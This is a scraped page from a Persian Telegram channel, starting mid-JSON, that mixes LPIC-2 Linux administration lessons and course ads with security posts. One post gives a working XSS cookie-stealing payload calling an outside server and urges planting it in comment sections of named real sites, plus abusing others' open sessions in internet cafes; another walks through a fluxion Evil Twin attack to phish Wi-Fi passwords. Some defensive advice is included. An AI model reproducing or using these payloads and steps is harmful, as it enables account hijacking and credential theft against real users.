شناساییش کنه. اگه نکرد، باید دستی update-grub یا grub2-mkconfig رو اجرا کنی.\n\n#### **۳. تغییر هسته در حال پرواز با sysctl (Live Kernel Tuning):**\nگاهی وقتا نمی‌تونی سرور رو ری‌بوت کنی. اینجا sysctl مثل یه چاقوی جراحی دقیق عمل می‌کافزایش سقف فایل‌های باز (File Descriptors):tors):** برای دیتابیس‌های بزرگ یا وب‌سرورهای پربازدید:\n echo \"fs.file-max = 1000000\" >> /etc/sysctl.conf\n sysctl -p (برای اعمال فواخطار:اخطار:** این عدد رو بیش از حد بالا نبر، چون هر فایل دیسکریپتور خودش مقداری RAM مصرف می‌کفعال کردن IP Forwarding (برای روتر کردن سرور):سرور):**\n echo \"net.ipv4.ip_forward = 1\" >> /etc/sysctl.conf\n sysctl -p\n* **کنترل سوآپ (Swappiness):** اگه سیستمت الکی میره تو سوآپ و کند می‌شه، می‌تونی swappiness رو کم کنی (بین ۰ تا ۱۰۰، پیش‌فرض ۶۰):\n echo \"vm.swappiness = 10\" >> /etc/sysctl.conf\n sysctl -p\n **نتیجه:** هرچی swappiness کمتر، هسته دیرتر سراغ فضای سوآپ میره و بیشتر سعی می‌کنه از RAM استفاده کنه.\n\nوقتی هسته رو طوری تنظیم می‌کنی که ذره‌ای از منابع سیستمت هدر نره، وقتی می‌تونی در حال پرواز (Live) تنظیماتش رو دستکاری کنی، اونجاست که دیگه فقط یه ادمجادوگر سیستم**جادوگر سیستم** شدی! این یعنی قدرت بی‌حد و حصر.\n\nری‌اکشن‌ها رو بکوب تا بریم سراغ درس ۳ که قراره با بوت لودرها کشتی بگیریم و از دل خاکستر، سیستم رو زنده کنیم!\n\nهزاران آموزش شبکه و امنیت (مخصوص حرفه‌ای‌ها):\n@Network_advanced\n\n#LPIC2 #Kernel #LinuxKernel #Sysctl #Compilation #AdvancedLinux #HardcoreLinux #SystemHacking","datePublished":"2026-02-27T16:33:09Z","dateModified":"2026-02-27T16:33:28Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3653","url":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3653","mainEntityOfPage":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3653","headline":"LPIC‑2 | Lesson 1 از اینجا به بعد دیگه بازی با دستورات ls و cd تموم شد. وارد دنیایی می‌شیم که درایورها و وقفه…","articleBody":"LPIC‑2 | Lesson 1\n\n از اینجا به بعد دیگه بازی با دستورات ls و cd تموم شد. وارد دنیایی می‌شیم که درایورها و وقفه‌های سخت‌افزاری (Interrupts) باید جلوی تو لنگ بندازن. اینجا LPIC-2 هست؛ جایی که ما لینوکس رو نمی‌رونیم، ما لینوکس رو کالبدشکافی می‌کنیم.\n\nاز درس ۱ شروع می‌کنیم، اما با غلظتی که مغزت بوی سیلیکون سوخته بده.\n\n---\n\n### درس ۱: پایش سیستم و پیش‌بینی ظرفیت (Capacity Planning) در سطح جانی!\n\nیک ادمین معمولی وقتی سرور کند می‌شه top می‌زنه و نگاه می‌کنه. یک مهندس LPIC-2 مثل تو، باید بتونه قبل از اینکه کاربر حتی بفهمه سرور قراره کند بشه، گلوگاه (Bottleneck) رو پیدا و خفه کنه.\n\n#### **۱. کالبدشکافی با sar (System Activity Reporter):**\nابزار sar عصای دست توئه. این ابزار داده‌ها رو از /proc می‌کشه و در فایل‌های باینری در /var/log/sa/ ذخیره می‌کنه.\nتحلیل حافظه در گذشته:ه:** فرض کن دیشب ساعت ۳ صبح سرور کرش کرده. با این دستور برگرد به عقب:\n sar -r -f /var/log/sa/sa$(date +%d -d \"yesterday\")\n اینجا دنبال ستون %commit بگرد. اگه این عدد از ۱۰۰ بالاتر رفته، یعنی سیستم بیش از حدِ توانِ واقعیش (RAM + Swap) به پروسس‌ها وعده فضا داده و دیشب \"OOM Killer\" اومده و پروسس‌ها رو سلاخی کرده.\n\n#### **۲. شکارچی گلوگاه: vmstat و وقایع پشت پرده:**\nاجرای vmstat 1 فقط چند تا عدد نیست، ضربان قلب سیستمه.\n* **ستون cs (Context Switches):** اگه این عدد به طور ناگهانی بالا بره (مثلاً بالای ۱۰۰ هزار)، یعنی CPU داره دیوونه می‌شه چون مدام مجبور ه بین پروسس‌های مختلف سوئیچ کنه و عملاً هیچ کار مفیدی انجام نمی‌ده.\n* **ستون in (Interrupts):** بالا بودن این عدد یعنی یه قطعه سخت‌افزاری (مثل کارت شبکه زیر حمله DDoS یا یه دیسک خراب) داره مدام به CPU سیگنال می‌فرسته و وقتش رو تل۳. شکنجه دیسک با iostat:یسک با iostat:**\nوقتی دیسک کند می‌شه، سیستم فلج می‌شه. این دستور رو بزن: iostat -xz 1.\n* **ستون await:** این حیاتی‌ترین عدده. یعنی میانگین زمانی (به میلی‌ثانیه) که یک درخواست I/O منتظر می‌مونه تا انجام بشه. اگه این عدد بالای ۱۰-۱۵ میلی‌ثانیه بره، دیسک‌های تو داستون %util:\n* **ستون %util:** اگه این ۱۰۰٪ باشه یعنی دیسک بندری می‌زنه و دیگه هیچ پهنای باندی نداری. وقتشه RAID رو ارتقا بدی یا ب۴. پیش‌بینی ظرفیت (The Engineering Art): Engineering Art):**\nمهندس واقعی با حدس و گمان کار Linear Regression*Linear Regression** استفاده کنی.\n* فایل‌های sa رو به متن تبدیل کن: sadf -d /var/log/sa/saXX -- -r > mem_usage.csv.\n* این داده‌ها رو توی اکسل یا با یه اسکریپت پایتون تحلیل کن. اگه نرخ رشد مصرف RAM ماهانه ۵٪ باشه و تو الان ۲۰٪ فضای خالی داری، یعنی دقیقاً ۴ ماه دیگه سرورِ تو می‌ترکه. این یعنی Capac۵. ابزارهای مدرن‌تر: ابزارهای مدرن‌تر:**\nیادت باشه collectd و Prometheus هم هستن، اما در امتحان LPIC-2 و در شرایطی که شبکه قطعه، تو فقط خودتی و sysstat. پس باید بتونی با sadc و sa1/sa2 دستی آمار جمع کنی.\n\nاگه فکر کردی ادمین بودن یعنی فقط نصب کردن پکیج، اشتباه کردی. ادمین لینوکس یعنی جراحِ ثانیه‌ها و بایت‌ها. وقتی بقیه دارن تو تاریکی دنبال مشکل می‌گردن، تو با تحلیل sar نور می‌تابونی به قلب سیستم.\nری‌اکشن رو بترکون تا بریم سراغ درس ۲ که قراره هسته لینوکس رو تیکه پاره کنیم!\n\nهزاران آموزش شبکه و امنیت (مخصوص حرفه‌ای‌ها):\n@Network_advanced\n\n#LPIC2 #SysAdmin #PerformanceTuning #CapacityPlanning #LinuxEngineering #Monitoring #HardcoreLinux","datePublished":"2026-02-26T18:40:02Z","dateModified":"2026-02-26T18:40:02Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":131},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":6}]}}]}
منشورات القناة
Repost from N/a
شروع ثبت نام دوره پایتون از شنبه اغاز میشه پیش نیاز اشنایی اولیه با الگوریتم فلوچارت هست اگه بلد نیستید اول اون دوره رو که قی
شروع ثبت نام دوره پایتون از شنبه اغاز میشه پیش نیاز اشنایی اولیه با الگوریتم فلوچارت هست اگه بلد نیستید اول اون دوره رو که قیمتش ناچیزه شرکت کنید و بعد اون پایتون قیمت دوره پایتون مقدماتی ۶۰۰ تومن هست و حالت قسط بندی هم داریم جهت ثبت نام پیوی تشریف بیارید @P_00_15

2
قیمت دوره هک و امنیت 450 بعلاوه 300 هست یعنی با قیمت ۴۵۰ شروع میکنیم و خب اگر دانشجویان جنبشو داشته باشن ۳۰۰ دیگه پرداخت میکنید که وارد فاز تست نفوذ بشیم این دوره ۷۰ درصد تئوری و ۳۰ درصد عملیه اما خب اگه جنبشو داشتید ۴۰ درصد تئوری و ۶۰ درصد عملی سر فصل ها رو موقع ثبت نام بهتون میگم جهت ثبت نام پیام بدین: @P_00_15
248
3
درود دوستان دوره الگوریتم و فلوچارت و دوره ورود به برنامه نویسی با زبان c++ توسط خودم همراه با پشتیبانی کامل ثبت نامش اغاز شده با توجه به پایدار نبودن اینترنت اکثریت امکان وصل شدنو نداشتن ترجیحمون اینه با توجه به قانونی بودن این دو دوره در پلتفرم های داخلی برگزارشون کنیم در روبیکا به این ایدی پیام بدین https://rubika.ir/ComputerScientist
175
4
لینک کانال های ما در روبیکا(نپرسید چرا اونجا فعالیت کردم تحت فشار و اجبارم...) کانال کوییز: https://rubika.ir/Techno_Quiz کانال اصلی: https://rubika.ir/TechnoTech کانال تکنو پک: https://rubika.ir/Techno_pack کانال برنامه نویسی: https://rubika.ir/Programming_society کانال شبکه: https://rubika.ir/Network_Society هوش مصنوعی: https://rubika.ir/AI_Community جزوه و کتاب: https://rubika.ir/Library_pack
204
5
امکان ذخیره پست ها همینک برای تمام کانال ها باز شد❤️
214
6
اعلام وضعیت کنید
219
7
درود دوستان روز بخیر و عیدتون مبارک مدتی که اینترنت در حالت ملی بود ناچار بودیم در پلتفرم های داخلی فعالیت کنیم... صرفا به دلیل اینترنت نیست کاربرای زیادی وجود دارن که در اونجا فعالیت دارن واسه اینکه مجموعمون بزرگتر شه و همه بشناسنمون در اونجا هم فعالیت هایی رو شروع کردیم... و حالا که اینترنت به حالت اولیش برگشته هم در اینجا و هم در اونجا فعالیت رو ادامه خواهیم داد البته پست های اینجا با اونجا فرق داره بودن در پلتفرم های داخلی اختیاریه اما اگه هستید میتونم لینک بدم جوین شید دقت کنید من همیشه جایی هستم که اکثر کاربرا قرار دارن... بودن من در اینجا زمانی که کمتر کاربر انلاینی وجود داشت بی نتیجه بود... واسه صاحب رسانه هایی مثل من دیده شدن اولویته حالا هر جا
217
8
تا وقتی همه نتونن به اینترنت دسترسی داشته باشن فعالیت نمیکنیم...
249
9
کافیه به اندازه کافی اینجا پست گذاشتم هر موقع ریکشن ها به اندازه کافی بیشتر شد ادامش میدم حمایت کنید...
29
10
ریکشن بزارید ادامش بدیم
25
11
💀 Evil Twin Attack (وقتی وای‌فای آشنا یه دامه!) تا حالا رفتی کافی‌نت، وای‌فای رو نگاه کردی دیدی دو تا "کافه_نت" هست؟ یه مال واقعیه، یه مال منه! این میشه Evil Twin. برادر دوقلوی شیطون! --- 🧠 ماجرا چیه؟ من یه access point می‌ذارم با اسم وای‌فای خودت. مثل: · "کافه‌نت" · "هتل_پارسیان" · "مهمان_رایگان" تو وصل می‌شی به من. منم: · همه ترافیکتو می‌بینم · پسوردهایی که می‌دی رو ذخیره می‌کنم · تو رو می‌برم به سایتای جعلی · بدافزار می‌ندازم تو گوشی و لپتاپت --- 🛠 ابزارای اجرا: ابزار کاربرد سطح airbase-ng ساخت AP جعلی متوسط fluxion Evil Twin + captive portal حرفه‌ای wifiphisher فیشینگ وای‌فای حرفه‌ای mana toolkit ابزار کامل حرفه‌ای --- 🔥 روش اجرا با fluxion (ساده ولی ترسناک): git clone https://github.com/FluxionNetwork/fluxion cd fluxion ./fluxion.sh بعد: 1. انتخاب کن کارت شبکه‌ات رو 2. انتخاب کن شبکه هدف رو (مثلاً "کافه_نت") 3. صبر کن تا دوقلوش ساخته بشه 4. به شبکه واقعی حمله کن تا همه کات شن 5. مردم خودشون میان به دوقلوی تو وصل می‌شن 6. صفحه جعلی پسورد براشون می‌اری، پسورد واقعی وای‌فای رو می‌دن! --- 🛡️ چطور بفهمیم گیر نیفتادیم؟ روش اول: چک کردن MAC address تو گوشی یا لپتاپ ببین MAC آدرس access point چیه. دو تا AP با اسم یکسان ولی MAC متفاوت؟ یعنی یکی دوقلوی شیطونه! روش دوم: ابزار WiFi Guardian اپلیکیشنایی هستن که شبکه‌های جعلی رو شناسایی می‌کنن. روش سوم: از VPN استفاده کن حتماً VPN! حتی اگه به AP منم وصل شی، ترافیکت رمز میشه. --- 🛡️ چطور از خودمون محافظت کنیم؟ برای کاربرا: · همیشه از VPN استفاده کن، حتی تو خونه · قبل از وصل شدن، از کافه یا هتل بپرس اسم دقیق وای‌فای چیه · اگه دو تا اسم تکراری دیدی، به هیچکدوم وصل نشو · روی گوشی "auto-connect" رو خاموش کن برای ادمینا: · از WPA2-Enterprise با 802.1X استفاده کن (هر کاربر یوزرنیم و پسورد خودشو داره) · از certificate برای احراز هویت استفاده کن · به مشتریهات آموزش بده به شبکه‌های تکراری اعتماد نکنن --- #EvilTwin #WiFiHacking #Fluxion #Wifiphisher #WirelessSecurity #RogueAP #ManInTheMiddle #MITM #WiFiPhishing #CaptivePortal #NetworkSecurity #CyberSecurity #RedTeaming #PenTesting #EthicalHacking #WiFiAttack #KaliLinux #AircrackNg #VPN #WPA2Enterprise #8021X #هک_وای_فای #دوقلوی_شیطون #امنیت_وای_فای #کافی_نت #امنیت_شبکه #آموزش_هک --- هزاران آموزش شبکه و امنیت @Network_advanced --- تا حالا به یه وای‌فای با اسم تکراری وصل شدی؟ می‌دونستی با fluxion می‌شه کل یه کافه رو به دام انداخت؟ اگه این پست به دردت خورد، ریکشن بزار. حمایت نکنی، می‌آم دوقلوت می‌سازم! 😂
106
12
🧨 Network Tarpitting (کند کردن حمله با فریب؛ وقتی هکر تو باتلاق گیر می‌کنه!) تا حالا فکر کردین به جای بستن در به روی هکر، بذاری بیاد تو ولی انقدر آهسته جواب بدی که دیگه کلافه بشه بره؟ به این میگن Tarpitting. یعنی حمله‌کننده رو تو یه باتلاق مجازی گیر میندازی! --- 🧠 ماجرا چیه؟ هکر عادت داره سریع نتیجه بگیره. پورت اسکن می‌کنه، باید جواب سریع بگیره. حمله پسورد می‌کنه، باید زود جواب ببینه. حالا تو می‌آی پورت رو باز می‌ذاری ولی: · به هر درخواست با تأخیر ۱۰ ثانیه جواب می‌دی · نصفه جواب می‌دی · گاهی اشتباه جواب می‌دی · تازه باهاش بازی می‌کنی! --- 🛠 انواع Tarpit: ۱. TCP Tarpit: یه پورت باز می‌ذاری. هکر وصل می‌شه. سرور جواب می‌ده "دیتا بگیر". هکر می‌گه "بفرست". تو می‌گی "صبر کن"... همین! تا ابد منتظر می‌مونه! ابزار: LaBrea معروف‌ترین تارپیت دنیا. ۲. HTTP Tarpit: به یه وب سرور جعلی وصل می‌شه. یه عالمه کوکی براش می‌فرستی، صفحه رو قطعه قطعه می‌دی، جاوااسکریپت بی‌نهایت لود می‌کنه. مرورگر هکر کرش می‌کنه! ۳. SSH Tarpit: یه سرور SSH جعلی می‌ذاری. هکر با هزار تا پسورد سعی می‌کنه. تو هر بار می‌گی "پسورد غلطه" ولی با تأخیر ۵ ثانیه. بعد از ۱۰۰۰ بار امتحان، دیگه پیر شده! ۴. SMTP Tarpit (مخصوص هرزنامه): هرزنامه‌فرست وصل می‌شه به میل سرورت. تو آهسته آهسته جواب می‌دی. اونم معطل می‌مونه تا تایم اوت بخوره. نتیجه: ربات اسپمر از کار می‌افته. --- 📊 ابزارای معروف: ابزار نوع کاربرد LaBrea TCP Tarpit گیر انداختن اسکنرها Endlessh SSH Tarpit کلافه کردن هکرای SSH SlowLoris HTTP Slow Attack حمله کند به سرور (سمت هکر!) Tarpit.py Python تارپیت ساده و شخصی‌سازی --- 🛡️ نصب و اجرای Endlessh (SSH Tarpit): sudo apt install endlessh sudo systemctl start endlessh حالا پورت ۲۲ رو می‌ذاری برای Endlessh، پورت اصلی SSH رو می‌بری یه جای دیگه. هر کی بخواد پسورد بزنه، می‌افته تو تله! --- 🔥 سناریوی واقعی: یه شرکت رو در نظر بگیر. روزی ۱۰۰۰ تا اسکن از چین و روسیه میاد. همه می‌خوان پسورد SSH رو پیدا کنن. مدیر شبکه می‌آد: · SSH اصلی رو می‌بره پورت ۲۲۲۲ · پورت ۲۲ رو می‌ده به Endlessh · حالا هر کی به پورت ۲۲ وصل بشه، می‌افته تو باتلاق نتیجه: ربات‌های هکر تا ۱۰ دقیقه معطل می‌شن تا قطع شن. دیگه کسی نمیاد سراغ این شرکت! --- 📌 جمع‌بندی: · تارپیت = گیر انداختن هکر در باتلاق کندی · LaBrea برای TCP، Endlessh برای SSH · هکرا از کندی متنفرن، باهاشون بازی کن · به جای بستن در، بذار تو باتلاق گیر کنن --- #NetworkTarpitting #Tarpit #LaBrea #Endlessh #SSHTarpit #HTTPTarpit #SMTPTarpit #Honeypot #CyberDeception #NetworkSecurity #SlowLoris #DDoS #PenTesting #RedTeam #BlueTeam #CyberDefense #ThreatHunting #IntrusionDetection #SSHSecurity #PortHoneypot #باتلاق_شبکه #تارپیت #سراب_شبکه #فریب_هکر #امنیت_شبکه #آموزش_امنیت #دفاع_شبکه --- هزاران آموزش شبکه و امنیت @Network_advanced --- تا حالا هکر رو تو باتلاق انداختی؟ به نظرت تارپیت بهتره یا بستن کامل پورت؟ اگه این پست به دردت خورد، ریکشن بزار. حمایت نکنی، می‌آم SSH رو تارپیت می‌کنم تا پیر شی! 😂
85
13
🔥 AI-Powered Network Attacks (حملات شبکه با هوش مصنوعی وقتی هکر دیگه آدم نیست!) تا حالا فکر کردین اگه هکر بات باشه چی؟ نه بات ساده واسه DDoS، یه هوش مصنوعی که خودش تصمیم می‌گیره، خودش نقص پیدا می‌کنه، خودش حمله می‌کنه. این دیگه ترسناکه! --- 🧠 ماجرا چیه؟ هوش مصنوعی تا دیروز تو دست ما بود برای دفاع. از امسال، تو دست هکرا هم هست برای حمله . دیگه یه هکر نشسته پشت سیستم نیست که دستور بده. AI می‌آد: · شبکه رو اسکن می‌کنه · آسیب‌پذیری پیدا می‌کنه · اکسپلویت می‌نویسه · اجرا می‌کنه · و حتی خودش رو پنهان می‌کنه همه اینا توی چند ثانیه، بدون دخالت انسان . --- 🛠 انواع حملات با هوش مصنوعی: ۱. Autonomous Attack Agents: یه AI که بهش می‌دی "برو تو شبکه فلان شرکت رو بزن". خودش: · پورت‌اسکن می‌کنه · سرویس‌ها رو شناسایی می‌کنه · آسیب‌پذیری‌های روز رو چک می‌کنه · اکسپلویت مناسب رو انتخاب می‌کنه · نفوذ می‌کنه · ردپا پاک می‌کنه ۲. AI-Powered Phishing: دیگه ایمیلای احمقانه "من شاهزاده نیجریه‌ام" تموم شد. AI می‌آد: · شبکه‌های اجتماعی قربانی رو می‌خونه · سبک نوشتنش رو یاد می‌گیره · یه ایمیل می‌نویسه دقیقاً مثل همکارش · لینک مخرب می‌ذاره · اگه کلیک نکرد، یه یادآوری دوستانه می‌فرسته! ۳. Deepfake Voice برای Vishing: تماس می‌گیره با صدای مدیرعامل: "علی جان، یه انتقال فوری داریم، ۵۰ میلیون بکن به این حساب، بعداً توضیح می‌دم." ۴. Automated Vulnerability Discovery: AI می‌چرخه تو کدهای متن‌باز، باگ پیدا می‌کنه، اکسپلویت می‌نویسه. دیگه نیازی به تیم قرمز نیست! --- 📊 ابزارایی که الان هست: ابزار/پروژه کاربرد سطح دسترسی WormGPT ساخت ایمیل فیشینگ دارک‌وب FraudGPT ابزارای هک با AI دارک‌وب DeepLocker بدافزار هوشمند (IBM) تحقیقاتی BlackMamba کی‌لاگر با AI POC --- 🛡️ چطور جلوش رو بگیریم؟ (کاری که خیلی سخته!) ۱. AI-Driven Defense: باید با AI جلوی AI رو بگیری . سیستم‌های دفاعی که خودشون AI دارن: · رفتار غیرعادی رو سریع تشخیص می‌دن · ترافیک رمزنگاری‌شده رو تحلیل می‌کنن (بدون باز کردن!) · به حملات سریع جواب می‌دن ۲. Behavioral Analysis: دیگه امضا (Signature) جواب نمی‌ده. باید رفتار رو رصد کنی. یه کاربر یهو ۱۰۰۰ تا فایل کپی کرد؟ یعنی یه چیزی غلطه. ۳. Zero Trust واقعی: همیشه چک کن، به هیچ‌کس اعتماد نکن. حتی اگه با صدای مدیرعامل زنگ زد! ۴. آموزش کارمندا: دیگه نمی‌شه گفت "روی لینک نزن". باید بهشون یاد بدی که حتی اگه مامانش ایمیل زد، شک کنه! --- 🔥 سناریوی ترسناک واقعی ۲۰۲۶: یه شرکت بزرگ رو در نظر بگیر. هکرها یه AI آموزش می‌دن با: · ایمیلای واقعی کارمندها · مکالمات ضبط‌شده · کدهای اختصاصی شرکت بعد این AI: ۱. صبح ساعت ۸: یه ایمیل از "مدیر فنی" میاد: "فایل به‌روزرسانی ضمیمه شده، نصب کنین." ۲. کارمند نصب می‌کنه ۳. بدافزار با AI داخلش تصمیم می‌گیره کی فعالیت کنه ۴. موقعی حمله می‌کنه که تیم امنیت ناهارن ۵. دیتا رو می‌کشه بیرون با ترافیک عادی HTTPS ۶. همه چی تموم! --- 📊 مقایسه حملات سنتی با AI: ویژگی حملات سنتی حملات با AI سرعت شناسایی متوسط سریع (adaptive) شخصی‌سازی کم بالا مقیاس محدود نامحدود ردپا داره تقریباً صفر نیاز به هکر داره می‌تونه نداشته باشه --- #AIPoweredAttacks #AIinCybersecurity #WormGPT #FraudGPT #Deepfake #AIPhishing #AutonomousMalware #CyberAI #AIDrivenDefense #ZeroTrust #BehavioralAnalysis #MachineLearningSecurity #ThreatIntelligence #RedTeaming #AdversarialAI #PromptInjection #LLMSecurity #DarkWeb #CyberThreats2026 #هوش_مصنوعی_در_هک #حمله_با_AI #دیپ‌فیک #فیشینگ_هوشمند #امنیت_شبکه #آموزش_هک #آموزش_امنیت --- هزاران آموزش شبکه و امنیت @Network_advanced --- تا حالا فکر کردی ایمیلی که از رئیست اومده رو شاید یه AI نوشته باشه؟ می‌دونستی تو دارک‌وب می‌توني WormGPT بخری با ۵۰ دلار؟ به نظرت چند سال دیگه هکرای انسان بیکار می‌شن؟ اگه این پست به دردت خورد، ریکشن بزن حمایت نکنی، میام یه AI می‌گیرم می‌ندازم تو شبکت! 😂
64
14
🔥 بیا تا بهت یاد بدم چطور با یه کوکی ساده بری تو حساب مردم! (Session Hijacking 101) --- 🍪 کوکی چیه؟ (اگه نمی‌دونی خجالت بکش) وقتی می‌ری تو اینستا یا تلگرام وب یا حتی دیوار و لاگین می‌کنی، یه چیزی به مرورگرت داده می‌شه به اسم کوکی. این کوکی مثل کارت شناسایی می‌مونه. هر بار می‌ری اون سایت، مرورگر می‌گه "سلام، من همونم، یادت هست؟" حالا اگه من این کوکی رو ازت بگیرم، می‌تونم برم تو حسابت. بدون اینکه پسوردتو بدونم. فقط با یه تیکه کد کوچولو. --- روش اول: XSS یا همون "نظر بده کوکی ببر" یه سایت پیدا کن که مردم بتونن نظر بدن. مثلاً یه سایت خبری ایرانی مثل دیجی‌اتو یا زومیت یا حتی یه وبلاگ شخصی. اگه اون سایت کصشر باشه و جلوی کد رو نگرفته باشه (که خیلی از سایتای ایرانی نمی‌گیرن)، من این کدو می‌ذارم تو بخش نظرات: <script>fetch('http://my-server.com/steal?cookie=' + document.cookie)</script> حالا هر کی اون صفحه رو ببینه، بی‌خبر کوکیش میاد پیش من. بعد من با اون کوکی می‌رم تو سایت. تموم شد. تبریک می‌گم، من الان تویی! --- روش دوم: ابزارایی که کارو واست راحت می‌کنن شاید کدنویسی بلد نباشی، نگران نباش. یکی برات ابزار ساخته: · EditThisCookie: یه افزونه کروم. می‌تونی کوکی رو ببینی، عوض کنی، هر کاری دوست داری بکنی · Cookie-Editor: همون کارو می‌کنه فقط تمیزتر · Wireshark: این دیگه حرفه‌ایاس. اگه بلد باشی باهاش کار کنی، هیچی ازت قایم نمی‌شه --- روش سوم: کافی‌نت یادت نره رفتی کافی‌نت، یه نفر قبلاً اونجا بوده و حساب دیوارش یا روبیکا یا حتی ایمیل خودش رو باز کرده. بلند شده رفته ولی مرورگر رو نبسته. احمق بوده دیگه. تو می‌آی بشینی پای همون سیستم. مرورگر رو که باز می‌کنی، می‌بینی هنوز تو حساب اون آدمی! حالا چکار می‌کنی؟ · می‌ری پیام‌هاش رو می‌خونی · آگهی می‌زاری به اسم خودش تو دیوار · به دوستاش پیام می‌دی تو روبیکا · اگه سایت اجازه بده، پسوردش رو عوض می‌کنی همش با یه کوکی که مونده تو مرورگر. به خدا اینقدر ساده اس که گاهی خودم خنده‌م می‌گیره. --- چطور جلوش رو بگیریم؟ (اگه نمی‌خوای بدبخت بشی) اگه کاربری: · مرورگر رو کامل ببند. فقط تب رو نبند · از حالت ناشناس استفاده کن · بعد کار حتماً Logout بزن · به HTTPS سایتا دقت کن. اون قفل سبز یعنی امنه اگه برنامه‌نویسی: · کوکی رو HttpOnly کن · Secure flag رو بذار · Session رو زود منقضی کن · ۲FA بذار برا سایتت --- حرف آخر: Session دزدی یعنی یکی میاد کوکی تو رو می‌گیره و می‌ره تو حسابت. نه پسوردتو می‌خواد، نه ایمیلتو. فقط کافیه تو یه لحظه غافل باشی. پس: · Logout یادت نره · مرورگرتو باز نذار · ۲FA بزن · تو کافی‌نتا مراقب باش --- #SessionHijacking #WebSecurity #XSS #هک #امنیت هزاران آموزش شبکه و امنیت: @Network_advanced
63
15
LPIC‑2 | Lesson 4 ### درس ۴: معماری ذخیره‌سازی پیشرفته (LVM & RAID) – پادشاهی بر قلمرو دیسک‌ها! اگه هنوز فکر می‌کنی پارتیشن‌بندی یعنی فقط fdisk و ساختن چندتا درایو خشک و خالی، همین الان مدرک لینوکست رو پاره کن! تو LPIC-2، ما دیسک رو به زنجیر می‌کشیم. ما یاد می‌گیریم چطور از ترکیب دیسک‌های داغون، یه ابر-ذخیره‌ساز بسازیم که حتی با سوختن دیسک هم آخ نگه! #### ۱. زنده کردن مردگان با Software RAID (ابزار mdadm): تو دنیای واقعی، دیسک‌ها می‌سوزن. این یه حقیقته. ولی یه مهندس لینوکس طوری سیستم رو می‌چینه که دیتاسنتر آتیش بگیره ولی دیتا نپره! * RAID 0 (سرعت مرگبار): دیتا رو تیکه تیکه می‌کنه روی دیسک‌ها. سرعت عالی، ولی اگه یه دیسک بسوزه، فاتحه کل دیتا خونده‌ست. (فقط برای کش و تمپ!) * RAID 1 (آینه): هر چی تو این بنویسی، تو اون یکی هم کپی می‌شه. امنیت ۱۰۰٪، ولی نصف ظرفیتت می‌پره. * RAID 5 & 6 (تعادل قدرت): استفاده از Parity. تو RAID 5 یک دیسک و تو RAID 6 دو دیسک همزمان بسوزن، سیستم عین ساعت کار می‌کنه. * فرمان عملیاتی: mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/sdb1 /dev/sdc1 /dev/sdd1 * مانیتورینگ وضعیت: همیشه چشمت به /proc/mdstat باشه. اگه دیدی نوشته [U_U], یعنی یکی از دیسک‌هات مرخص شده و باید سریع جایگزینش کنی! #### ۲. انعطاف مطلق با LVM (Logical Volume Manager): LVM یعنی آزادی! یعنی وقتی پارتیشن /var پر شد، لازم نیست سرور رو خاموش کنی یا پارتیشن رو دیلیت کنی. * سلسله مراتب قدرت: 1. PV (Physical Volume): تبدیل پارتیشن‌های خام به خمیر بازی لینوکس! (pvcreate /dev/sdb1) 2. VG (Volume Group): ریختن همه PVها تو یه ظرف بزرگ. انگار یه دیسک غول‌آسا داری. (vgcreate my_data /dev/sdb1 /dev/sdc1) 3. LV (Logical Volume): بریدن تکه‌های دلخواه از اون ظرف بزرگ. (lvcreate -L 100G -n web_data my_data) * افزایش حجم در حال پرواز (On-the-fly): lvextend -L +50G /dev/my_data/web_data -r اون سوئیچ -r معجزه‌ست! همزمان هم حجم رو زیاد می‌کنه، هم فایل‌سیستم رو (بدون Unmount کردن!). #### ۳. سفر در زمان با LVM Snapshots: این یکی از خطرناک‌ترین و جذاب‌ترین ویژگی‌های LVM هست. می‌خوای آپدیت سنگین بزنی و می‌ترسی سیستم بترکه؟ یه Snapshot بگیر! lvcreate -s -n backup_before_update -L 5G /dev/my_data/web_data حالا یه "تصویر" از لحظه حال داری. اگه گند زدی، می‌تونی برگردی به عقب (Rollback). این یعنی بیمه‌ی عمر دیتای تو! #### ۴. عیب‌یابی و جراحی دیسک‌های خراب: وقتی یه دیسک تو RAID می‌سوزه، نباید دست و پات رو گم کنی. 1. دیسک خراب رو Fail کن: mdadm /dev/md0 --fail /dev/sdb1 2. دیسک رو خارج کن: mdadm /dev/md0 --remove /dev/sdb1 3. دیسک جدید رو بنداز و اضافه کن: mdadm /dev/md0 --add /dev/sde1 حالا بشین و تماشا کن که چطور سیستم خودش رو بازسازی (Rebuild) می‌کنه. مهندسی دیسک یعنی تو هیچ‌وقت غافلگیر نمی‌شی. تو همیشه یه نقشه جایگزین داری. تو به دیسک‌ها دستور می‌دی، نه اونا به تو! قدرت مدیریت ذخیره‌سازی، قلب تپنده هر دیتاسنتره. ری‌اکشن‌ها رو بترکونید که درس ۵ قراره بریم سراغ اعماق شبکه و فایروال‌های پیشرفته! هزاران آموزش شبکه و امنیت (مخصوص کسانی که دیسک‌ها رو به زانو درمی‌آورند): @Network_advanced #LPIC2 #LVM #RAID #Mdadm #StorageArchitecture #SysAdmin #AdvancedLinux #DiskManagement #Snapshot #DataRecovery
87
16
